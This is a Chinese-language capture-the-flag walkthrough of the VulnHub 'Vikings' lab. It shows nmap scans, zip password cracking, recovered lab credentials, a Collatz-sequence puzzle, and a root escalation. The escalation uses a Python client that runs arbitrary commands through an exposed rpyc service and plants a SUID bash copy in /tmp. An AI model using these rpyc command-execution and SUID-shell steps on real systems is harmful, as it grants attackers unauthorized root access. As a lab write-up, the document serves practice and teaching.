打靶记录(一六六)之VulnHubVikings

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 14:36 HKT
Nmap scan report for 192.168.56.109
Host is up (0.00057s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:41:94 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 14:37 HKT
Nmap scan report for 192.168.56.109
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
|   256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-title: Index of /
MAC Address: 08:00:27:B5:41:94 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

web

得到一个/site路由，继续扫描后得到一个war.txt,里面是一个war-is-over/,访问后得到一串编码，发现base64解码之后是一个压缩包,爆破密码哈希

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ zip2john 1.zip >hash

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123      (1.zip/king)     
1g 0:00:00:05 DONE (2024-12-07 14:54) 0.1754g/s 53176p/s 53176c/s 53176C/s redsox#1..kweens
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到密码:ragnarok123

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ binwalk -e king     

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
1429567       0x15D03F        Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

分离得到一个文本文件:

┌──(mikannse㉿kali)-[~/vulnhub/vikings/_king.extracted]
└─$ cat user          
//FamousBoatbuilder_floki@vikings                                     
//f@m0usboatbuilde7

经过尝试,floki是用户名，下面是密码，可以ssh登录

横向移动

发现一个boat的文本,定义了一个num=第29个素数,经过搜索，collatz-conjecture是一个数学问题:对于任意正整数n，如果n是偶数，则下一步为n/2；如果n是奇数，则下一步为3n+1。重复这个过程，最终会到达1

那么尝试计算，第二十九个素数是109

生成collatz序列,随便网上找一个脚本

print("This is The Collatz Sequence")
user = int(input("Enter a number: "))

def collatz(n):
    print(n)
    while n != 1:
        if n % 2 == 0:
            n = n // 2
            print(n)
        else:
            n = n * 3 + 1
            print(n)
            
collatz(user)

生成列表文本

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ echo 109 | python 1.py  >1.txt

还得手动处理一下这个列表，然后加上109在第一行才可以，也就是:

109
328
164
82
41
124
...

根据提示，也就是要找出可打印的字符，并且把ascii码转成可打印字符，可打印字符的ascii码范围是32-126

text=''
with open('1.txt','r') as file:
    for num in file:
        if 32<=int(num) <=126:
            text=text+chr(int(num))
print(text)

得到:mR)|>^/Gky[gz=.F#j5P(

可以横向到ragnar用户

提权

但是找不到什么有用的信息,上pspy

发现一个python3 /usr/local/bin/rpyc_classic.py进程，查了以下，似乎是允许客户端执行任意python命令,服务端已经打开，是开在18122端口

那么只需要连接服务端，并且让服务端执行命令就可以了

写一个客户端交互脚本，即可执行系统命令

import rpyc

def execute_remote_command(conn, command):
    try:
        print(f"Executing command: {command}")
        
        # 在远程服务器上执行命令
        exit_code = conn.modules.os.system(command)
        
        print(f"Command executed. Exit code: {exit_code}")
        
    except Exception as e:
        print(f"An error occurred while executing the command: {e}")

def main():
    try:
        # 连接到rpyc经典服务器 (默认localhost, 端口18812)
        conn = rpyc.classic.connect("localhost")
        print("Connected to the rpyc server.")
        
        while True:
            # 从用户获取要执行的命令
            command = input("Enter a command to execute on the server (or 'exit' to quit): ").strip()
            
            if command.lower() == 'exit':
                break
            
            execute_remote_command(conn, command)

    except ConnectionRefusedError:
        print("Could not connect to the rpyc server. Is it running?")
    except Exception as e:
        print(f"An error occurred: {e}")
    finally:
        if 'conn' in locals() and conn is not None:
            conn.close()
            print("Connection closed.")

if __name__ == "__main__":
    main()

然后运行

$ python3 rpc.py
Connected to the rpyc server.
Enter a command to execute on the server (or 'exit' to quit): cp /bin/bash /tmp/root_bash
Executing command: cp /bin/bash /tmp/root_bash
Command executed. Exit code: 0
Enter a command to execute on the server (or 'exit' to quit): chmod +xs /tmp/root_bash
Executing command: chmod +xs /tmp/root_bash
Command executed. Exit code: 0
Enter a command to execute on the server (or 'exit' to quit): exit
Connection closed.

$ ./root_bash -p
root_bash-4.4# whoami
root

我们是root!

顺带一提，服务器上有防火墙，目标端口改成80即可绕过

碎碎念

非常misc的一台靶机,有点抽象233